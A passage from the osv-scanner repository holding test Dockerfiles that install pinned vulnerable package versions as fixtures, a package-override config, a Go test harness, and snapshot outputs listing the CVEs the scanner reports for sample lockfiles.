"pnpm@$MANAGER_VERSION" # initialize the package.json using the manager RUN pnpm init # ensure that we finish fully installed RUN pnpm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-pnpm-full.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="8.15.4" WORKDIR /prod/app # install the desired package manager RUN npm i -g "pnpm@$MANAGER_VERSION" # initialize the package.json using the manager RUN pnpm init # install a few dependencies at specific versions RUN pnpm add mkdirp@0.5.0 RUN pnpm add -d cryo@0.0.6 # ensure that we finish fully installed RUN pnpm install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-yarn-empty.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="1.22.22" WORKDIR /prod/app # install the desired package manager RUN npm i -g "yarn@$MANAGER_VERSION" --force # initialize the package.json using the manager RUN yarn init -y # ensure that we finish fully installed RUN yarn install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-node_modules-yarn-full.Dockerfile ================================================ FROM node:20-alpine@sha256:c0a3badbd8a0a760de903e00cedbca94588e609299820557e72cba2a53dbaa2c ARG MANAGER_VERSION="1.22.22" WORKDIR /prod/app # install the desired package manager RUN npm i -g "yarn@$MANAGER_VERSION" --force # initialize the package.json using the manager RUN yarn init -y # install a few dependencies at specific versions RUN yarn add mkdirp@0.5.0 RUN yarn add --dev cryo@0.0.6 # ensure that we finish fully installed RUN yarn install ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-package-tracing.Dockerfile ================================================ FROM golang:1.22.4-alpine3.20@sha256:ace6cc3fe58d0c7b12303c57afe6d6724851152df55e08057b43990b927ad5e8 AS build COPY package-tracing-fixture/ /work RUN cd /work && go get github.com/BurntSushi/toml@v1.4.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.4.0 RUN cd /work && go get github.com/BurntSushi/toml@v1.3.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.3.0 RUN cd /work && go get github.com/BurntSushi/toml@v1.2.0 && go mod tidy RUN cd /work && go build . RUN cp /work/ptf /work/ptf-1.2.0 # RUN go install github.com/google/osv-scanner/cmd/osv-scanner@v1.3.0 # RUN cp /go/bin/osv-scanner /go/bin/osv-scanner-1.3.0 # RUN go install github.com/google/osv-scanner/cmd/osv-scanner@v1.8.1 # RUN cp /go/bin/osv-scanner /go/bin/osv-scanner-1.8.1 # RUN go install github.com/google/osv-scanner/cmd/osv-scanner@v1.5.0 # RUN cp /go/bin/osv-scanner /go/bin/osv-scanner-1.5.0 FROM alpine:3.20.1@sha256:b89d9c93e9ed3597455c90a0b88a8bbb5cb7188438f70953fede212a0c4394e0 COPY --from=build /work/ptf-1.2.0 /work/ptf-1.3.0 /work/ptf-1.4.0 /go/bin/ # This tests when a file that exists in the final layer doesn't exist in one intermediate layer RUN mv /go/bin/ptf-1.3.0 /go/bin/ptf-1.3.0-moved RUN cp /go/bin/ptf-1.3.0-moved /go/bin/ptf-1.3.0 # This tests when a file only exist in a intermediate layer RUN cp /go/bin/ptf-1.3.0 /go/bin/ptf-1.3.0-copy RUN rm /go/bin/ptf-1.3.0-copy # This tests when a less vulnerable file overwrites a more vulnerable file # This tests when a less vulnerable file overwrites a more vulnerable file RUN cp /go/bin/ptf-1.3.0 /go/bin/ptf-vulnerable RUN cp /go/bin/ptf-1.4.0 /go/bin/ptf-vulnerable # This tests when a more vulnerable file overwrites a less vulnerable file RUN cp /go/bin/ptf-1.4.0 /go/bin/more-vuln-overwrite-less-vuln RUN cp /go/bin/ptf-1.2.0 /go/bin/more-vuln-overwrite-less-vuln ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-python-empty.Dockerfile ================================================ # Use the official Debian image as the base FROM python:3.9-slim-buster@sha256:320a7a4250aba4249f458872adecf92eea88dc6abd2d76dc5c0f01cac9b53990 # Set the working directory in the container WORKDIR /app # Copy the rest of the application code into the container COPY python-fixture/main.py main.py # Specify the command to run when the container starts CMD ["python", "main.py"] ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-python-full.Dockerfile ================================================ # Use the official Debian image as the base FROM python:3.9-slim-buster@sha256:320a7a4250aba4249f458872adecf92eea88dc6abd2d76dc5c0f01cac9b53990 # Set the working directory in the container WORKDIR /app # Copy the requirements file into the container COPY ./python-fixture/requirements.txt . # Install the Python dependencies RUN pip install --no-cache-dir -r requirements.txt # Copy the rest of the application code into the container COPY python-fixture/main.py main.py # Specify the command to run when the container starts CMD ["python", "main.py"] ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-ubuntu-20-04.Dockerfile ================================================ FROM ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-ubuntu-with-packages.Dockerfile ================================================ FROM ubuntu:22.04@sha256:ed1544e454989078f5dec1bfdabd8c5cc9c48e0705d07b678ab6ae3fb61952d2 # Install fzf from a existing build to keep it pinned to a specific version COPY ./sample-pkgs/fzf_0.29.0-1ubuntu0.1_amd64.deb /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb RUN dpkg -i /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb && rm /tmp/fzf_0.29.0-1ubuntu0.1_amd64.deb ================================================ FILE: cmd/osv-scanner/scan/image/testdata/test-ubuntu.Dockerfile ================================================ FROM ubuntu:22.04@sha256:ed1544e454989078f5dec1bfdabd8c5cc9c48e0705d07b678ab6ae3fb61952d2 ================================================ FILE: cmd/osv-scanner/scan/image/testdata/ubuntu20-04-unimportant-config.toml ================================================ [[PackageOverrides]] name = "coreutils" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "gcc-10" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "glibc" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "gnupg2" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "libgcrypt20" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "libtasn1-6" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "ncurses" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "pam" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "pcre2" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "perl" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "shadow" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "systemd" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "dpkg" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "gnutls28" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "tar" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "lz4" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "util-linux" reason = "Just want to test only unimportant vulns" ignore = true [[PackageOverrides]] name = "zlib" reason = "Just want to test only unimportant vulns" ignore = true ================================================ FILE: cmd/osv-scanner/scan/image/testmain_test.go ================================================ package image_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/image" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { config.OSVScannerConfigName = "osv-scanner-test.toml" slog.SetDefault(slog.New(testlogger.New())) testcmd.CommandsUnderTest = []cmd.CommandBuilder{image.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/scan/source/__snapshots__/command_test.snap ================================================ [TestCommand/.gitignored_files - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand/.gitignored_files - 2] --- [TestCommand/Empty_cyclonedx_1.4_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.4.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.4", "version": 1, "components": [], "vulnerabilities": [] } --- [TestCommand/Empty_cyclonedx_1.4_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_cyclonedx_1.5_output - 1] { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [], "vulnerabilities": [] } --- [TestCommand/Empty_cyclonedx_1.5_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_gh-annotations_output - 1] --- [TestCommand/Empty_gh-annotations_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_sarif_output - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "version": "2.1.0", "runs": [ { "addresses": [], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "/r/n", "/n" ], "policies": [], "redactionTokens": [], "results": [], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "properties": {} } --- [TestCommand/Empty_sarif_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Empty_spdx_2.3_output - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/uuid-placeholder-0", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "2025-01-01T01:01:01Z" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-uuid-placeholder-1", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-uuid-placeholder-1", "relationshipType": "DESCRIBES" } ] } --- [TestCommand/Empty_spdx_2.3_output - 2] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml --- [TestCommand/Go_project_with_an_overridden_go_version - 1] Scanning dir ./testdata/go-project Scanned /testdata/go-project/go.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand/Go_project_with_an_overridden_go_version - 2] --- [TestCommand/Go_project_with_an_overridden_go_version,_recursive - 1] Scanning dir ./testdata/go-project Scanned /testdata/go-project/go.mod file and found 1 package Scanned /testdata/go-project/nested/go.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestCommand/Go_project_with_an_overridden_go_version,_recursive - 2] --- [TestCommand/Go_project_with_an_overridden_go_version_and_licences - 1] Scanning dir ./testdata/go-project Scanned /testdata/go-project/go.mod file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +--------------+-------------------------+ | BSD-3-Clause | 1 | +--------------+-------------------------+ --- [TestCommand/Go_project_with_an_overridden_go_version_and_licences - 2] --- [TestCommand/PURL_SBOM_case_sensitivity_(api) - 1] Scanning dir ./testdata/sbom-insecure/alpine.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Total 2 packages affected by 5 known vulnerabilities (1 Critical, 3 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/PURL_SBOM_case_sensitivity_(api) - 2] --- [TestCommand/PURL_SBOM_case_sensitivity_(local) - 1] Scanning dir ./testdata/sbom-insecure/alpine.cdx.xml Scanned /testdata/sbom-insecure/alpine.cdx.xml file and found 15 packages Filtered 1 local/unscannable package/s from the scan. Loaded Alpine local db from /osv-scanner/Alpine/all.zip Total 2 packages affected by 9 known vulnerabilities (3 Critical, 5 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9840 | 8.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9841 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9842 | 8.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2016-9843 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2018-25032 | 7.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.10-r0 | -- | testdata/sbom-insecure/alpine.cdx.xml | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------+ --- [TestCommand/PURL_SBOM_case_sensitivity_(local) - 2] --- [TestCommand/Sarif_with_vulns - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "version": "2.1.0", "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///testdata/locks-many-with-insecure/package-lock.json" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "/r/n", "/n" ], "policies": [], "redactionTokens": [], "results": [ { "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///testdata/locks-many-with-insecure/package-lock.json" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'ansi-html@0.0.1' is vulnerable to 'CVE-2021-23424' (also known as 'GHSA-whgm-jr23-g3j9')." }, "rank": -1, "relatedLocations": [], "ruleId": "CVE-2021-23424", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "CVE-2021-23424", "GHSA-whgm-jr23-g3j9" ], "fullDescription": { "markdown": "This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.", "text": "This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time." }, "help": { "markdown": "**Your dependency is vulnerable to [CVE-2021-23424](https://osv.dev/CVE-2021-23424)**.\n\n## [GHSA-whgm-jr23-g3j9](https://osv.dev/GHSA-whgm-jr23-g3j9)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-many-with-insecure/package-lock.json | ansi-html | 0.0.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-whgm-jr23-g3j9 | ansi-html | 0.0.8 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-many-with-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-23424\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [CVE-2021-23424](https://osv.dev/CVE-2021-23424)**.\n\n## [GHSA-whgm-jr23-g3j9](https://osv.dev/GHSA-whgm-jr23-g3j9)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time.\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/testdata/locks-many-with-insecure/package-lock.json | ansi-html | 0.0.1 |\n\n## Remediation\n\nTo fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below.\n\n### Fixed Versions\n\n| Vulnerability ID | Package Name | Fixed Version |\n| --- | --- | --- |\n| GHSA-whgm-jr23-g3j9 | ansi-html | 0.0.8 |\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/testdata/locks-many-with-insecure/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"CVE-2021-23424\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "CVE-2021-23424", "name": "CVE-2021-23424", "properties": { "security-severity": "7.5" }, "relationships": [], "shortDescription": { "markdown": "CVE-2021-23424: Uncontrolled Resource Consumption in ansi-html", "text": "CVE-2021-23424: Uncontrolled Resource Consumption in ansi-html" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "properties": {} } --- [TestCommand/Sarif_with_vulns - 2] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand/Scan_locks-many - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand/Scan_locks-many - 2] --- [TestCommand/all_supported_lockfiles_in_the_directory_should_be_checked - 1] Scanning dir ./testdata/locks-many-with-invalid Scanned /testdata/locks-many-with-invalid/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-invalid/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand/all_supported_lockfiles_in_the_directory_should_be_checked - 2] Error during extraction: (extracting as php/composerlock) /testdata/locks-many-with-invalid/composer.lock: could not extract: invalid character ',' looking for beginning of object key string --- [TestCommand/config_file_can_be_broad - 1] Scanning dir ./testdata/locks-many-with-insecure Scanning dir ./testdata/locks-insecure Scanning dir ./testdata/maven-transitive Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Scanned /testdata/locks-insecure/osv-scanner-flutter-deps.json file and found 3 packages Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Scanned /testdata/maven-transitive/pom.xml file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Filtered 1 local/unscannable package/s from the scan. Package npm/has-flag/4.0.0 has been filtered out because: (no reason given) Package npm/wrappy/1.0.2 has been filtered out because: (no reason given) Package npm/ansi-html/0.0.1 has been filtered out because: (no reason given) Package npm/balanced-match/1.0.2 has been filtered out because: (no reason given) Package Maven/org.apache.logging.log4j:log4j-api/2.14.1 has been filtered out because: it makes the table output really really long Package Maven/org.apache.logging.log4j:log4j-core/2.14.1 has been filtered out because: it makes the table output really really long Package Maven/org.apache.logging.log4j:log4j-web/2.14.1 has been filtered out because: it makes the table output really really long Filtered 7 ignored package/s from the scan. overriding license for package Packagist/league/flysystem/1.0.8 with 0BSD overriding license for package Alpine/alpine-baselayout/3.4.0-r0 with MIT overriding license for package Alpine/alpine-baselayout-data/3.4.0-r0 with MIT overriding license for package Alpine/alpine-keys/2.4-r1 with MIT overriding license for package Alpine/apk-tools/2.12.10-r1 with MIT overriding license for package Alpine/busybox-binsh/1.36.1-r27 with MIT overriding license for package Alpine/ca-certificates-bundle/20220614-r4 with MIT overriding license for package Alpine/libc-utils/0.7.2-r3 with MIT overriding license for package Alpine/libcrypto3/3.0.8-r0 with MIT overriding license for package Alpine/libssl3/3.0.8-r0 with MIT overriding license for package Alpine/musl/1.2.3-r4 with MIT overriding license for package Alpine/musl-utils/1.2.3-r4 with MIT overriding license for package Alpine/scanelf/1.3.5-r1 with MIT overriding license for package Alpine/ssl_client/1.36.1-r27 with MIT overriding license for package Alpine/zlib/1.2.13-r0 with MIT overriding license for package Packagist/drupal/core/10.4.5 with 0BSD overriding license for package Packagist/drupal/simple_sitemap/4.2.1 with 0BSD overriding license for package Packagist/drupal/tfa/2.0.0-alpha4 with 0BSD overriding license for package Packagist/league/flysystem/1.0.8 with 0BSD overriding license for package Packagist/sentry/sdk/2.0.4 with 0BSD overriding license for package Packagist/theseer/tokenizer/1.1.3 with 0BSD Total 6 packages affected by 10 known vulnerabilities (2 Critical, 2 High, 2 Medium, 3 Low, 1 Unknown) from 4 ecosystems. 6 vulnerabilities can be fixed. +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+--------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+--------------------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | | https://osv.dev/DRUPAL-CORE-2025-005 | 2.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-83v7-c2cf-p9c2 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-006 | 5.9 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-m6vv-vcj8-w8m7 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-007 | 2.1 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-h89p-5896-f4q8 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-008 | 3.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-mhpg-hpj5-73r2 | | | | | | | | https://osv.dev/DRUPAL-CONTRIB-2025-083 | | Packagist | drupal/simple_sitemap | 4.2.1 | -- | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+--------------------------------------------------+ +---------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +---------+-------------------------+ | MIT | 15 | | 0BSD | 7 | | UNKNOWN | 5 | +---------+-------------------------+ +-------------------+-----------+------------------------------------------------+--------------+-------------------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+------------------------------------------------+--------------+-------------------------------------------------------+ | 0BSD | Packagist | league/flysystem | 1.0.8 | testdata/locks-insecure/composer.lock | | UNKNOWN | Go | stdlib | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | UNKNOWN | Go | toolchain | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | UNKNOWN | | 